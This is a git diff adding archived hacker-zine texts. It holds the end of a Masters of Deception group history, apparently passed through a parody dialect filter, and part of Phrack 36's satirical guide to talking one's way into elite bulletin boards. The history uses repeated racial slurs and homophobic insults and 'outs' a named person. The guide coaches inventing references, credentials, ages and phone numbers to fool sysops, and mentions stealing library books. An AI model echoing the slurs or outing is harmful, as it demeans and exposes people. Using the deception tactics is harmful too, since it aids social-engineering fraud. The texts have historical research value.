+chance t'put to use deir years uh interrogashun techniques classes.  Seems dey
+dink he showed his teacha' a credit repo't o' sump'n...
+
+A few weeks go by, and MOD gits t'know Seeker.  Word to ya motha'.  He sounds
+def enough, and he knows his electronics so's he be a real valuable addishun
+t'de group.  Seeka' made his way in and so's dun did de million-and-one MOD
+stickers and funny-colo'ed-little-box-din'ies. De stickers, uh which, made deir
+way t'Ground Zero's big-ass butt at some 2600 meetin'.
+
+Anyways, de MOD Unix went down, and 3 local gangsta's wid much potential caught
+attenshun t'dem.  'S coo', bro.  Dey wuz:  ZOD (a Unix gangsta'), Outlaw (just
+a general dude), and sum nigga name Co'rupt (Vax kin').  Afta' days uh gettin'
+t'know dem, dey wuz pulled in.  'S coo', bro.  Countless weeks went by wid whut
+seemed likes a dozen MOD fuckin'bbs's on 800s, packet switched netwo'ks, etc...
+
+De group's popularity so'ed in such some sho't puh'iod uh time, but many
+gangsta's disagreed wid de MOD style much in de same way Phiba' Optik had
+enjoyed humiliatin' dose "in de know" publically.  Slap mah fro!
+
+ZOD wuz de last uh de group t'be raided (o' at least da damn most recent), but
+gots 'em sum since made much 'haidway into de telecom wo'ld.  Outlaw gots 'em
+sum also been somewhut adept wid telco speak.  Sum nigga' name Co'rupt, havin'
+been real active befo'e, duzn't gots' some wo'kin' computa' anymo'e and so..
+sheeit, duh.
+
+Two new members wuz introduced around da damn time uh de writin' uh dis
+chapter.  Word to ya motha'.  De fust wuz De Plague.  Word!   He had some
+professional attitude and wuz certainly wo'd trustin'.  Of course, wid all de
+media attenshun drawn to him and MOD in general, he gots 'em sum decided
+t'remain low and not brin' any mo'e t'himself.  Word!
+
+Red Knight wuz o'iginally on trash runs wid Acid Phreak in '89 but wuz not
+brought in until July '90.  It seems RK gots 'em sum learned some lot about
+telco ways since he fust put up De Toll Center.  Word to ya motha'. RK also
+seems to enjoy reminiscin' about da damn trash run days (of which dere wuz
+quite a few).
+
+As uh August 1, 1990, dere are 14 members.  Dese include, dig dis:
+
+Acid Phreak (r)
+HAC
+Sco'pion (r)
+De Win' (v)
+Supuh'nigger
+Nynex Phreak (r)
+Phiba' Optik (r)
+Crazy Eddie (r)
+Seeker
+ZOD (r)
+Outlaw
+Sum nigga' name Co'rupt
+De Plague
+Red Knight
+
+(v) signifies sucka' wuz visited but nodin'  took
+(r) means eida' raided o' retired, it's some pickem.  'S coo', bro..
+
+      - - ->  MOD be now *CLOSED* t'membership.  <- - -
+
+      Dis be de official (and most likesly t'be da damn final) list
+      uh dewds.  Of course, members may use some GROUP account o'
+      anoda' handle, but da damn fact remains dat dese are da damn ONLY
+      members in de group.  Unlikes LOD, we know who be in and who
+      isn't..
+
+We should also note Julian Dibbell (Dr. Bombay) fo' his wo'k on "Rebel Hackers"
+in De Village Voice on July 24, 1990.  He po'trayed de scene da damn way it
+really be and uh course gave us de amount uh coverage we deserve.  Word!   And
+uh course, we came out da damn way we really are and not as gangsta's out
+t'destroy de wo'ld. Dr.  Word to ya motha'. Bombay wuz invited t'de MOD Unix
+right befo'e da damn raid.  'lo and behold.. some front-page cover sto'y.
+Word!
+
+"We rule".
+
+MOD/Fo'eva' We Hack
+
+
+
+BOOK FOUR:  End uh '90-1991
+
+Two weeks befo'e his bust, Lo'd Micro wuz introduced into de group.
+Unfo'tunately he wuz busted fo' hackin' FON cards off de 800/877-8000. Sho'
+nuff, he knowed he wuz gonna git busted but he dun didn't listen, o' care fo'
+dat matter.  Word to ya motha'.  Afta' hours (and hours, and hours) uh
+community service, LM lived t'joke about his o'deal bein' dat he IS some funny
+guy.  Slap mah fro!  Don't eva' get dis guy drunk.
+
+Fo' quite some long time now, MOD gots 'em sum jet to realize whut some bunch
+of idiot posers de LOD wuz (wid de 'sepshun uh a few).  It plum goes t'show,
+ANYONE kin be some great gangsta' as long as enough sucka's dink so's too.  Why
+boda' resparkin' interest in MOD?  Why boda' keepin' de damn thang goin' when
+de new members ain't half as fresh as de o'iginals? ah'  duzn't know, but ya'
+kin ax' Erik Bloodaxe who be de self-proclaimed "leader" at dis point in time.
+Word!   Jeez, and ah' dought brin'in' back TAP wuz stupid.
+
+Anoda' posa' dat came out uh de woodwo'k be Skandle (STAN), who somehow decided
+he had powa' in DPAK (Supuh'nigger's group).  Afta' hours of tryin' t'figure
+dis one out, we plum had t'conclude wuz plum anoder dumb Jersey hick.  Oh
+sheeit.. so's much fo' dat.
+
+A new group, FORCE 1(ONE) Hackers led by Expose(which sounds fuckin gay if ya
+ax' me), decided t'declare war on MOD.  Assisted by Hellrat, he says, dig dis:
+"You's guys (MOD) should stay out uh de hackin' buziness 'cuz none uh my fellas
+are 'fraid uh ya'.  I'll  snatch all uh ya' out mah'self.  Word! " ...along wid
+some lot of oda' nonsense about 10-way billin' and oda' ca-ca he's read in one
+too many g-files.
+
+One thang dat's def be de addishun uh a lama' database online (on wingnet now
+MODNET).  It's great when you be plannin' roll-ups and shit and it's some great
+o'ganiza' dat takes care uh all dat rummagin' drough sheets and shit.  Hundreds
+uh losers fo' hours uh fun.  Word!
+
+Durin' de fust week in February, MOD finally declared,"Dat's it. Word!  It's
+official now.  LOD declares war on MOD.  Word!  "  Oh broder.  Word to ya
+motha'...eenie-meenie-minie-moe.  Word!  I declare war on......YOU. Word!
+Nyah-nyah.  Sheeit, it be now de second week uh February and da damn only thang
+dat gots 'em sum happened so's far in de "MOD-LOD War" be dat dere wuz about 5
+invalid login attempts on modnet.  It seems dat "MOB" gots 'em sum decided
+t'join in de war.  Word to ya motha'.  What some fuckin' joke, dey are tied wid
+MCWS fo' lameness (which isn't hard t'do).
+
+De legacy uh de underground "clandestine" netwo'k continues and so's duz de
+war (and ridiculin') against all de self-proclaimed, so-called "elite".
+
+
+BOOK FIVE: Who are dey and where dun did dey jet from?
+
+        Sheeit, it's time again fo' anoda' journul.  It's now de
+        middle uh summa' 1991.  Lately we've heard some few fresh sto'ies
+        out uh de mouds uh sucka's we  duzn't even know.  Dere gots'
+        even been some few funny occurances in de past few weeks.
+
+        1) Dere are rumours dat Phiba' Optik wuz wuztin' his life
+        away and not usin' his talents wisely.  Slap mah fro!
+        Sheeit, de trud of de matta' is, he gots 'em sum been some
+        speaka' in many public debates and conferences on hackin' in
+        general and computa' security.  Slap mah fro!  He be also wo'kin'
+        as some programmuh/developuh' fo' some computa'
+        firm in NYC.  Also, he be wo'kin' closely wid de EFF (which
+        recently gots' set up deir own systum fo' deir o'ganizashun).
+
+        2) COMSEC be fo'med.  De *new* LOD (whose only member
+        consists uh Erik Bloodaxe) goes into de computa' security
+        binnis.  Nodin' t'date be documuhnted on deir services and
+        we gots' yet t'see whut de hell dey kin provide.  Word!   EBA fo'
+        one be an o'iginal memba' and he knows close t'nodin'
+        (except fo' de thangs dat he ax'ed Phiba' Optik t'tell
+        him).  Not t'muhntion dese guys are hardly co'po'ate and gots'
+        NO 'espuh'ience in de binnis end uh computa' security; which
+        'esplains why dey gots caught misrepresentin' demselves as
+        Landmark Graphics t'oda' well-established computa' security
+        firms.  Also, dey gots' bragged about narkin' on some few members
+        uh MOD in deir jealous rage.  Word!   Dis we kin prove drough
+        insiders.
+
+        MOD wuz neva' a text stash "how-to" group.  It wuz always based
+        on some broderhood type deal and everydin' done be secretive
+        and gots 'em sum some purpose behind it.  LOD on de oda' hand, never
+        made sense t'any uh us anymo'e.  Word!   It wuz fresh at fust, when
+        all de o'iginal (knowledgable) members wuz active, but
+        lately it's become t'be knode as some group uh guys wid
+        real sparce telecom knowledge ridin' on some name dat once
+        actually stood fo' sump'n.
+
+        Even Phiba' Optik quesshuned wheda' LOD meant Legion uh Doom
+        o' Lump uh Doo-doo (on Gyrotechnic's private fuckin'bbs).  He stood
+        firm against all de oda' members on de systum until finally
+        dey wuz dumbfounded and speechless.  Sheeit, de bo'd died.
+        Now, PO and da damn rest uh de MOD bunch  snatch t'dem likes a
+        swatta' to fdiss.  Give it up fellas.. it'll neva' wo'k.
+
+        3) Renegade Hacka' (a NYC local) dinks he's def.  He gits
+        raided, starts rapin', and when confronted by MOD, hides
+        behind mommy.  Slap mah fro!  Den he says he hates MOD (which
+        be funny since he wuz sweatin' MOD's nuts since da damn day he
+        fust gots some modem; dose who wuz at da damn 2600 know whut
+        ah' mean.  'S coo', bro..) De fact remains he be a real losa'
+        out t'make some name fo' himself by tryin' t'inspire dose who
+        gots' less contact wid de better gangsta's in de community.
+        Slap mah fro!
+
+        NASTY (his group) = BIG Joke.  Word!
+        (dey scribble files..de Nashunal Enquira' of de h/p wo'ld)
+
+        *Rent-A-Gay Hacka' changed his fone #.. please note da damn new
+        one in de database.  Word! *
+
+        4) Lo'd Micro gits Xenix and creates whut gots'ta be modnet 2.
+        (De Win' be de mina'strato' uh #1 in PA)  Crazy Eddie
+        plans t'put up some fuckin'bbs (open fo'um) in de 2600 Magazine
+        fo'mat (likes OSUNY, Central Office, De Toll Center).
+        NO illegal shit...plum deo'etical discusshun..whut real
+        gangsta's are made of.  Word!
+
+        5) Vinny (De Technician) be "outed".  He be an admitted
+        homosexual. I'm tellin' ya'.. watch out fo' dese SSWC
+        guys..dey're some little funny, ya know?
+
+        6) Mind Rape, o' sump'n likes dat, uh NSA be a new pest.
+        Gimme some break.  When gots'ta dey eva' learn?  Infiniti wuz
+        anoda' one, but ah' guess he's kept quiet..which be fresh.
+        Let's plum hope he duzn't ax' Mind Dweeb fo' help.  Add
+        Purple "no-show" Mustard (c0dez kid..see MOD/database fo' mo'e
+        info) t'dis catago'y.  Slap mah fro!  Also, dere's anoda' guy usin'
+        Acid's handle in 216.  Wasn't home when we called twice.  Word!
+
+
+Special danks t'Jack Hitt and Paul Tough uh Harpuh''s Magazine.  Word!
+Great guys, fresh scribblers/edito's..  damn dat stuff wuz fun.
+'S coo', bro.
+
+Hello t'State Police Offica' Donald Delaney.  Slap mah fro!  Not such
+some bad-ass guy, plum dat he IS some cop and he DID bust some uh us.
+But he also gots dose guys piratin' cellular service in Queens, which
+really wuz a majo' bust.  Nice tie.  Word!
+
+===================
+= Anoda' MOD.duh  =
+= file            =           "Mo'e eLiTenezz in one pinky
+=                 =            dan 2 kans uh LOD.  Word!  "
+= All repdiss kin =
+= be sent to,     =
+=    dig dis:     =
+=                 =
+= MOD@modnet.UUCP =
+===================
+-> kill r0dentz.  Word!  .  Word!  .  Word!
+
+MoDm0dMoDm0dMoDm0dMoDm0dMoDm0dMoDm0dMoDm0dMoDm0dMoDm0dMoDm0dMoDm0dMoDm0dMoDm0d
diff --git a/phrack36/5.txt b/phrack36/5.txt
new file mode 100644
index 0000000..ad78b7d
--- /dev/null
+++ b/phrack36/5.txt
@@ -0,0 +1,694 @@
+                                ==Diet Phrack==
+
+                 Volume Three, Issue Thirty-Six, File 5 of 11
+
+                                *Elite* Access!
+                      A Tutorial On Being An Elite Hacker
+
+                         By Dead Lord and Lord Digital
+
+                               Lords Anonymous!
+
+                              September 25, 1986
+                              Revised May 2, 1988
+                         Revised Again August 20, 1991
+
+
+PROLOGUE
+========
+For reporters, brain dead media types, or anyone else reading this who has been
+blessed with a room temperature IQ and faulty observational abilities; "Elite"
+as it's applied to the "underground" community, is a phrase that theoretically
+denotes the top 2-5% of the hacking and phreaking community and its rather
+peculiar hierarchy.  Realistically it denotes the 2-5% that spend the greatest
+amount of time polishing up their image on boards instead of doing what they're
+presumably good at (hacking).
+
+This article is designed to allow you (yes YOU the junior G-man; would be
+Secret Service agent; publicity whore; over-eager journalist, or just bored
+modem owner and future potential ELITE) access to almost anything you might
+wish to call; in addition to providing you with the knowledge necessary to
+impress other ELITE's with your learned brilliance.
+
+
+CONTENT
+=======
+A tutorial for all the people too dense to figure out the quirks of human
+nature all by themselves, who also have some inane desire to have access to
+ELITE boards, containing ELITE information and ELITE users, along with ELITE
+wares, 42 seconds after they are cracked by ELITE crackers.  Not to mention
+ELITE dial-ups to ELITE companies, which will work for approximately 15 minutes
+before some idiot logs in and does something to fuck them up.
+
+I'm writing it because I am bored of doing all this by myself, with only a
+handful of peers to accompany me.  Not that I expect to gain "peers" from
+people that need help from this text file, but I imagine it'll give ELITE
+Sysops something else to do with their time.  I also hope to save you 2-5 years
+of time.  2-5 years is the average lifespan of an ELITE person, before he gets
+a life and comes to the understanding that he just wasted 2-5 years.
+
+Please don't misunderstand me when I say 2-5 years, there are many people who
+have been ELITE for almost 10 years and are still going strong.  I wouldn't
+want to step on any ego's, or ruin anyone's life work, now would I...
+
+
+BOARDS
+======
+ELITE boards exist because the people who populate them, believe themselves to
+be superior to the people populating all the other boards.  Most people don't
+agree with them, but they agree with each other.  100-200 people being
+sufficient to set up their own personal version of the world, they gather
+together on these ELITE boards and do ELITE things like post new wares, engage
+in "rag wars" and type things up out of manuals at each other.
+
+
+SYSOPS
+======
+Seeing how you're trying to get access to an ELITE board, you should have a
+basic understand of who the Sysop is, and why he's running the board.  This
+part is easy, in over 95% of all cases, the Sysop is a egotistical fool, who is
+willing to give up the use of his computer, or computers, in exchange for the
+privilege of playing GOD with the hopeless sots who log in.
+
+This is especially the case on all manner of ELITE boards that request a "real"
+telephone number, voice validation, and the donation of your first born male
+child for even higher access.  All under the guise of "security."  Requesting a
+"real" voice number, or even name, is nothing that unusual.  Almost all
+"mainstream" non-Pirate and non-Phreak systems require it.
+
+Of course there is nothing stopping you from leaving them Anal Annie's phone
+sex service as your home number, and picking a random name.  That will usually
+be the end of that. The only time the Sysop will ever check into your
+information will be if you happen to become a "rodent" and annoy him and/or the
+users of his BBS, in which case he'll engage you in a 20 letter conversation,
+each one giving a really sincere and heartening reason why you would feel so
+much better if you gave him your phone number, and why he just HAS to have it
+for reasons you wouldn't understand, because ALL Sysops MUST keep track of who
+uses their systems, don't ya know?
+
+This file won't cover "normal" Sysops, because if you aren't capable of
+bullshitting THEM, then you're hopeless and may as well find a new hobby.  Like
+gardening is pretty exciting I hear, fer instance...
+
+
+"VOICE" NUMBERS
+===============
+The truth is there is no reason on earth, why a Sysop should EVER need your
+voice number, or any information on you at all.  Naturally he'll WANT it,
+because being the kind of person who runs a BBS in the first place, he's a nosy
+and prying kind of guy that want's to know everything about you.  For reasons
+of "board security" of course.
+
+Let me tell you about board security; it doesn't exist!  When a
+system is "secure" all that means is that the Sysop has lulled himself into a
+false sense of safety that bears little relation to the actual state of his
+board.  But that's beside the point.  The point being that you DON'T want to
+hear from the Sysop; EVER.
+
+One of the reasons they give for "needing" your voice number is
+
+     "Well "Well if there's ever something wrong with the bbs, I need to
+     be able to let you know, or ask you what commands you used if you
+     were the last user before it crashed."
+
+Isn't that nice...  How many Sysop's notify their users when their board goes
+down for repairs?  NOT ONE.  As for problems, well what do I care?  The last
+thing I want is Melvin Sysop calling me up when I'm watching Miami Vice and
+trying to have a 5 hour conversation with me because he has nothing else to do
+with his time.  Or better still, having my phone number embedded in his
+software when the Secret Service busts down his door because he carded 50 hard
+drives to his home address.
+
+I know many Sysops, some of them are even my friends.  These are the kinds of
+things Sysops do with their userlists.  Of course ALL of them will CLAIM that
+other Sysops might do that, but THEY never would, God no, not them!
+
+
+FAVORITE SYSOP USES FOR USERS' TELEPHONE NUMBERS
+================================================
+
+     I.  When any "new ware" is released (and he happens to be a Pirate kind of
+         guy), Sysops go through every name on the userlist, call them up and
+         ask for the new ware.  If you don't have the new ware, or just say you
+         don't in the hopes that he will fuck off, he will then proceed to bug
+         the hell out of you by asking for 50 other wares that he just has to
+         have.
+
+    II.  If he's an ELITE PHREAK kinda guy and some national emergency takes
+         place such as his favorite 800 dying on him; he does the same thing as
+         the Pirate type Sysop and calls everyone on the userlist begging for
+         800's, "any cool info", and pw's to CIS.
+
+   III.  More so with Phreaks than Pirates, but somewhat true for all of them:
+         The Sysop want's an update on some latest tidbit of hot gossip that he
+         will just die if he doesn't find out.  He will then try to have
+         another 5 hour conversation with you about whatever drivel he called
+         you up to discuss.
+
+    IV.  Some people trade baseball cards, some people trade comics, some
+         people trade phone numbers.  Sysops LOVE to trade phone numbers,
+         especially those of "influential" users.  I don't know why, they
+         usually lack the balls to even call them beyond the customary dial,
+         wait for some person's voice, then slam the phone down and go jerk off
+         because all that excitement gave them a hard-on.  This is very much to
+         your benefit as I'll explain a little further down.
+
+     V.  And worst of all, there is the "lonely Sysop", the guy who will call
+         you every "day" at 2 in the morning and try to have an engaging
+         conversation about whatever happened in his "life" that day.
+
+There are many other things Sysops do with your number, but as far as I'm
+concerned, those were the worst.  OK, I'm going on and on about why a Sysop has
+no need for your number, and how he'll annoy you to death if he ever gets it,
+so YOU know that now, but what do you do about it?
+
+
+GETTING VALIDATED
+=================
+There is no big trick to being validated.  In almost every case, the Sysop
+asking for a voice number, is just his usual hoopla and he'll never bother to
+check out anything you give him that passes as "information."  If you leave a
+reasonably intelligent copy of feedback, kiss his ass in a sublime kind of way,
+and in general explain to him why having you on his bbs will make his life much
+better than it is now; you'll be validated with normal access.
+
+Uploading new wares or files, posting messages, and drivel along those lines,
+will get your access raised.  You can also bullshit for higher access, but I'm
+assuming YOU don't know how, which is why you're reading this file to begin
+with.  BULLSHITTING is an artform and I have neither the time or patience to
+type up a file on it, so I'm doing this instead.
+
+
+EXAMPLE PIRATE BOARD FEEDBACK
+=============================
+
+Hello,
+    I'm the Masked Avocado.  I just
+got your bbs #, from an advertisement
+that was posted on Capital Connection.
+  I liked what the message had to say,
+so I called to check your board out.
+    I can contribute newsoftware,
+programming help, and anything that mi
+ght help to enhance your bbs.
+I also distribute for Coast to Coast
+and Digital Gang.  My latest wares
+include: MultiScribe //gs 2.1.2.4
+ HiggyBBS 6.2 Deluxe Paint Print
+Plus 2.1
+By the way, my first name is Melvin,
+I'm 13^H^H19, and my system is made
+up of an enhanced //e, 212 applecat,
+ 3.5 drive and a bunch of
+peripherals.  Thanks for your time,
+Melvin
+
+     Let's examine that and highlight a few points.
+
+     I.  ALWAYS use decimal points when describing new wares.  Copy ][+ has a
+         revision every 2 weeks that does nothing except update the parm files.
+         NEW WARES! have constant updates and "Pirates" are always on the
+         lookout to increase the decimal point revision of their software.
+         Even if it does NOTHING different EXCEPT change the decimal point.
+
+         Aside from the fact that feedback is just bullshit to get you
+         validated, you can very easily get a sector editor up and change a few
+         decimal points yourself.
+
+    II.  ALWAYS say you got his BBS number from some established ELITE board,
+         in the case of Pirates, Capital Connection is always a good bet.  In
+         reality it's quite a lame board, but other board Sysops seem to feel
+         otherwise, and besides instantly impressing the Sysop of the board
+         you're logging into (by being a member of CapCon), he will also get a
+         kick out of it that some idiot posted his board on the CapCon "BBS
+         Ads" section.
+
+[Please note that "Capital Connection" was valid at this file's original incept
+date.  The average Pirate board having a lifespan of 6 months at best; Capital
+Connection no longer exists.  The current Elite Pirate board of the next 6
+months, is "Trade Center."]
+
+   III.  Among your list of "new wares" you can always list some BBS program,
+         because every week some dork writes a new program, that is lousy,
+         never works right, and if ever faced with "put up or shut up" you can
+         change around any one of 50 different BBS programs, and upload it as
+         the NEW WARE!
+
+[Same with software as with boards -- it doesn't stay new very long.  I can't
+help you here because I haven't the slightest idea what's new in Apple
+software.  However, all you need to do is invest 3 bucks in the latest issue
+of whatever magazine pertains to your particular computer, and list off some
+of the software you see advertised.]
+
+    IV.  Always say you distribute for some random collection of new wares
+         groups.  Nobody can prove that you don't (logging into one cat-fur and
+         uploading the wares you found on it, to another cat-fur, is
+         distributing) and it will make the Sysop think that you'll be
+         uploading 20 sided GS wares to his board every day.
+
+[As you may have guessed, new wares groups also come and go.  Digital Gang
+still exists, as do a slew of new groups; if you don't know of any, a safe bet
+is making up a name and saying that you're based somewhere in Europe.  Europe
+being the fabled birthplace of all the best new Atari and Amiga software in
+particular.]
+
+     V.  Always list "your" first name and age.  Make up an age that is over 16
+         so they won't discriminate against you.  If you're under 16 and admit
+         it in your feedback, you'll be instantly labeled an idiot.
+
+    VI.  Always list some of your hardware.  Don't ask me why, it's just
+         another item in the agenda of things that Sysops like to pry into.  If
+         you give them this information without them asking for it, it makes
+         them feel better.
+
+   VII.  Always end the message with a "thanks for your time."  Remember, he's
+         an egotistical fool, and that one line makes him think you respect
+         him, want to do things for him, and would be genuinely happy to be a
+         member of his AWESOME board.
+
+  VIII.  ALWAYS sign it with "your" first name, this keeps the tone informal,
+         and makes you seem like a less threatening type of guy.
+
+
+GENERAL TIPS
+============
+Remember that many Pirate boards have a "VOTE ON NEW USERS" feature, so
+don't say anything that you wouldn't want the entire world to read.  If you
+follow those basic guidelines, you'll ALWAYS get validated if the rest of your
+information is right.  The rest being your phone number if the Sysop actually
+calls new users.
+
+Some of you are saying to yourselves: Yeah, but if you just listed all of this,
+won't Sysops be on the lookout for this kind of feedback?  Yeah, but then who
+are they going to validate?  "Obvious" rodents?  No, if they want new users
+then they'll be more than happy to accept you.
+
+
+EXAMPLE PHREAK BOARD FEEDBACK
+=============================
+
+Greetings,
+     I'm Tesla Coil of The Crossbar Rapists (TC of TCR).  I was told by a
+user of Metal Shop Private (MSP), that your bbs was worth looking into. I've
+been published in TAP, 2600, and Uncle Mel's Phone Times.  My handle was listed
+in issue 12 of Security Systems of Greater Podunk (SSoGP) as a "Computer genius
+breaks into Podunk's Private Database!" I've been hacking since 1981, I was a
+member of Sherwood Forest, Securityland, The AT&T Phone Center, OSUNY, OSUNY
+when it went back up, WOPR, LOD the BBS, Cryton, COSMOS, Metal Shop Private,
+and OSUNY when it came back for yet another go at it.  I had to change my
+handle for reasons of security when I was taken out by the feds in the 1983 414
+busts.
+
+     I'm an expert with Unix, RSTS, Primos, and HiggyOS.  I can program in C,
+D, E, and F, Fortran 77 and 78, Basic for the Cyber, IBM, MAC, Amiga, ST, and
+Apple II.  I also know assembly for the 6502, 8088, 68020, Z-80a, and TIMEX.  I
+have an Apple //e, IBM AT, Mac+, and Kim-A1.
+
+     After entering college last year, my time was seriously limited.  But
+after getting some additional free time, I've decided to restart my hobby of
+hacking and exploring the phone system.  My current interest centers around the
+understanding of the myriad functions associated with CLID.
+
+       People who can recommend me include (Pick 4 or 5 names of people who
+aren't really ELITE, but not unknown to current ELITE Sysops either).  If you
+can't think of them, pick up any issue of PHRACK and take a few out of there.
+The reason you want "not really ELITE" people, is because they won't command
+too much attention.  You DON'T WANT excess attention, saying that some dork who
+writes for Phrack recommends you, is less noticeable than saying some "real"
+ELITE recommends you.  Why say ANYONE recommends you, if it's so much trouble?
+Because it somehow flips a switch in the Sysop's mind, which makes him think
+that you must be an OK dude, if so and so recommends you.  Nine out of ten
+times he won't check.  The one time he does check, the person he's bothering
+will usually say "yeah yeah, go away I'm doing something" and that'll be the
+end of it).
+
+[Please note that by "real elite" I don't mean anyone who is better, rather I
+mean someone who has spent tremendous amounts of time generating exposure for
+his handle.]
+
+     Thanks for you time, Tesla Coil/The Crossbar Rapists
+
+    Let's examine this one too.
+
+     I.  As you can see we've switched from 40 columns, to 80 columns complete
+         with some form of spacing.  We've also gotten a little bit more-let's
+         say-"readable" than in our previous Pirate feedback example.  This is
+         because we're calling a different kind of system, with a different
+         program than cat-fur ENHANCED 1.1!
+
+    II.  With Phreak Sysops you don't want to get too informal, because most of
+         them are busy playing SECRET AGENT MAN and if you do something normal
+         like sign off with "your" first name, he'll think you're not being
+         "professional."  How it is in his mind that he equates "professional"
+         with calling his board:  I don't know, but trust me on this point.
+
+   III.  In the same vein of "professionalism", you're expected to list off
+         your "accomplishments".  Oddly enough, in Phreak/Hacker HIERARCHY,
+         getting arrested numerous times is considered ELITE by many of it's
+         peoples.  Why this is, I don't know either.  Personally, it says to me
+         that the person who got arrested has the brains of an African bushman,
+         but apparently, that's just my lone opinion.  Anyhow, in line with
+         this PROFESSIONAL attitude you are expected to list your life's
+         accomplishments in the space of 50-100 lines, in a form that will make
+         you sound like the best Hacker in the world, who is so good, that
+         logically he wouldn't be caught dead calling the ELITE board you're
+         calling, but once again skipping the logic and getting back to the
+         Sysops expectations...
+
+    IV.  OK continuing with the thought we started... list off a bunch of
+         languages, knowing them is optional, because the Sysop doesn't know
+         them either.  Reading the dust jacket and index on a book covering
+         any of those subjects will enable you to APPEAR to know what you're
+         doing, which is all that the Sysop is doing, so don't worry about it,
+         because he doesn't know vi from cd, and couldn't INFILTRATE a Unix if
+         he had the root account.  If you don't want to spend $5000 stocking up
+         on ELITE TECHNICAL MANUALS, go down to the library and xerox a bunch
+         of index's.  Or better yet, just check out the books and never return
+         them (if your library lets you check out reference manuals.  Most
+         don't, but you can always rip out that little magnetic sensor in the
+         card on the book and walk out with it anyway, but I digress...).
+
+     V.  After you've done that, list a bunch of micro-specific assembly
+         languages that you "know," and in general just make up things until
+         you've filled up around 2 paragraphs or so.  95% of ELITE
+         PHREAKING/HACKING is just posing anyway, so don't feel guilty about it
+         or let it worry you too much because that's the same way 9/10th of the
+         board got access.  Unless they were ELITE, which is just posing to a
+         higher degree than most bother to go with.
+
+    VI.  Remember to say WHERE YOU GOT THE NUMBER FROM!  This is because like I
+         said before, most Phreaks are busy playing SECRET AGENT MAN and will
+         get an ulcer and lay awake at night thinking that CABLE PAIR is
+         infiltrating their board.  You know it isn't true, but the Sysop will
+         wet his pants anyway, so just put his mind at rest and make up some
+         place where you got the number from.  Metal Shop is always a safe bet,
+         because it's the Phreak dumping ground of ELITENESS, much like CapCon
+         is the Pirate's equivalent.  Be sure to use vague terms like "I was
+         told by a user of..." and things of that nature that can't be readily
+         verified, but still sound plausible.
+
+[Ahem, sorry to interrupt again, but as you may have guessed, MSP is down at
+this time.  MSP's new replacement is the Legion of Doom base BBS that goes by
+the name of "Digital Logic."  A large percentage of the users there are under
+phony handles that gained entry by exactly the type of bullshitting I'm
+writing about in this article.  The remaining phony accounts got access by
+threatening the Sysop with "Phreak retaliation" and having him cave into
+demands; which for a LOD board is about par for course.]
+
+   VII.  Next make up your "writing credits" and "media credits".  Select a few
+         random issues of random magazines that you either wrote for, or had
+         your alias' mentioned in.  Make sure they're of the small circulation
+         type and the issue is at least 2 years old.  Nobody will ever check or
+         even have a way of checking if they wanted to.  Most people who
+         "wrote" things just rephrased tech manuals and copied the
+         illustrations.  If you're ever pressured to come up with something YOU
+         wrote, just do the same thing because that's what all the other ELITES
+         are busy doing.  Be sure to run it through a spelling checker
+         so it looks PROFESSIONAL as ELITE PHREAKS are fond of looking and
+         thinking of themselves.
+
+  VIII.  Next list off a bunch of ELITE BOARDS you've been a member of.
+         Listing those that I just listed are a safe bet, because they're
+         famous or as the case may be infamous, to such a degree that the Sysop
+         will have heard of them.  He wouldn't have been on them, so he won't
+         be able to verify that either.  The reason he wouldn't have been on
+         them, is because he hasn't been ELITE longer than 2 years, otherwise
+         he wouldn't be running a board. If he HAS been ELITE for
+         longer than two years, and IS still running a board, then he's an
+         idiot and you can safely assume that he wouldn't have been on them
+         anyway.  Not that being an idiot disqualifies anyone from being a
+         member of anything, but APPEARING to be an idiot will do that.  COSMOS
+         is ALWAYS a great bet, because it just sounds so PHONESY!  Plus there
+         have been half a dozen COSMOS' in the last year alone, so he won't
+         know which one, even if none of them have ever been FAMOUS!
+
+    IX.  If you're such a swell guy, and have been around so long, he might
+         wonder what you've been doing with yourself for the last 6 months.  SO
+         So just make up some half-witted excuse like the one I listed.  Then
+         include something about your current "interests."  All you need to
+         remember about that is include "CLID" (Calling Line ID), "BLV" (Busy
+         Line Verify), or any other semi-interesting acronym out of a USO
+         coding manual.  Obviously you don't need to know anything about it
+         beyond the fact that such an acronym actually exists and you know
+         about its existence.  If questioned further, just bring down the
+         "veil of secrecy" and become mysterious and evasive about it.  This
+         will instantly go great lengths towards improving your status on a
+         board.
+
+     X.  References have been covered in the parenthesis in the feedback
+         itself, so I hope I don't need to get into it again here.
+
+    XI.  ELITE Phreak/Hacker boards also expect "freebies" from you the
+         potential user, to the Sysop.  Both as a "test" of your "skill" and as
+         a kind of ass kissing.  Freebies can include COSMOS PW'S! which are
+         easy, because there are like 10 of them which people have been listing
+         for the last 5 years, which haven't worked for 4 1/2 years, but people
+         still list them.  Which makes me conclude that people never use them,
+         they just write them down and repost them every 6 months.  Or CIS
+         accounts, or some good 800's or anything of "value".  You don't really
+         need to include any of this, but if you can it makes you look better.
+         NEVER, EVER give the Sysop ANYTHING of any value that you might want
+         to use in the future, because if it's of any worth he will immediately
+         do something stupid to make it stop working.  That you can COUNT ON!
+
+   XII.  Close it up with the usual "Thanks for your time", but sign it with
+         your full handle, followed by group.  PROFESSIONAL!  [Giggle]
+         <STOP THAT!  I'M SERIOUS NOW!>  <slap>
+
+
+GENERAL TIPS
+============
+Ok, now that I've got you psyched at how easy it is, here is the bad news.  The
+bad news is like this:  In order to be an ELITE Pirate, you don't have to know
+ANYTHING, PERIOD, AT ALL, EVER.  All you need to be able to do is operate your
+copy of cat-fur with reasonable dexterity and spend 2-5 hours of each day
+calling things and uploading NEW WARES.  If you can program, so much the better
+because then it's easier to join the ELITEST ELITE of piracy (the Crackers).
+Now I know you're thinking it's stupid to have ELITE people who aren't good at
+anything, but I never claimed the world was a sensible place.
+
+With PHREAKING (let me just say that when I say PHREAKING I also mean to
+include HACKING) you are expected to APPEAR to know how things work.  Now that
+is a little tricky.  It's tricky because ELITE boards like to have FILTERS.  A
+kind of "front door/quiz" combination.  The trouble with that is, that the
+Sysop doesn't really know what he's doing either and will take the questions
+out of an ELITE FILE.  The problem is that the ELITE FILE might not have been
+accurate, so even if you know the answer, you might not know the answer that
+the Sysop is expecting, and as far as the Sysop is concerned is the "RIGHT"
+answer.  This means that you had better stop laughing at those stupid files and
+deleting them, because if you want to get access someplace, you might need them
+for something besides "God, is he stupid!" jokes!
+
+
+HOME PHONE NUMBERS AND HOW TO DEFEAT THEM
+=========================================
+Ok, so now you know how to get validated, what to say and how to act.  Let me
+get you past the last and only "real" hurdle to access to everything you
+desire.
+
+Voice validation is a load of crap.  It doesn't work, it never has worked and
